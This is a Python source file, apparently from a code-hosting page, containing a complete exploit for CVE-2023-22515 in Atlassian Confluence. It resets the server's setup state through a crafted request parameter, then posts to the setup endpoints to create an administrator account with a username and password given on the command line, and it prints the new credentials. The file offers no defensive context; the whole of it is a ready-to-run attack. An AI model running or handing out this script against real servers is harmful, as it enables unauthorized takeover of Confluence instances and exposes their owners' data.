42 lines
1.5 KiB
Python
42 lines
1.5 KiB
Python
import sys
|
|
|
|
import requests
|
|
|
|
|
|
def exp(url, username, password):
|
|
headers2 = {
|
|
"X-Atlassian-Token": "no-check",
|
|
"Content-Type": "application/x-www-form-urlencoded"
|
|
}
|
|
headers3 = {
|
|
"X-Atlassian-Token": "no-check",
|
|
}
|
|
data = f"username={username}&fullName={username}&email={username}@localhost&password={password}&confirm={password}&setup-next-button=Next"
|
|
if url.endswith('/'): # 去除末尾斜杠
|
|
url = url[:-1]
|
|
url1 = url + "/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false"
|
|
r1 = requests.get(url=url1)
|
|
url2 = url + "/setup/setupadministrator.action"
|
|
r2 = requests.post(url=url2, headers=headers2, data=data, allow_redirects=False)
|
|
if r2.headers.get("Location") == "/setup/finishsetup.action":
|
|
url3 = url + "/setup/finishsetup.action"
|
|
r3 = requests.post(url=url3, headers=headers3)
|
|
if r3.status_code == 200:
|
|
print("管理员账户创建成功!")
|
|
print("账户密码为: " + username + "/" + password)
|
|
else:
|
|
print("发生意料之外的错误!")
|
|
else:
|
|
print("创建用户失败!")
|
|
print(r2.headers.get("Location"))
|
|
print(r2.status_code)
|
|
|
|
if __name__ == '__main__':
|
|
if len(sys.argv) != 4:
|
|
print("用法: python3 CVE-2023-22515.py url username password")
|
|
sys.exit(1)
|
|
url = sys.argv[1]
|
|
username = sys.argv[2]
|
|
password = sys.argv[3]
|
|
exp(url, username, password)
|